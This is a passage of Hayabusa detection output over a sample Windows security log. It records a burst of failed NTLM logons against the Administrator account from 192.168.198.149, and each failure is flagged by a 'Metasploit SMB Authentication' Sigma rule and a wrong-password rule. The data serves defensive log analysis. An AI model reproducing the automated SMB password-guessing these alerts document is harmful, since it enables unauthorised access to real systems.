Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 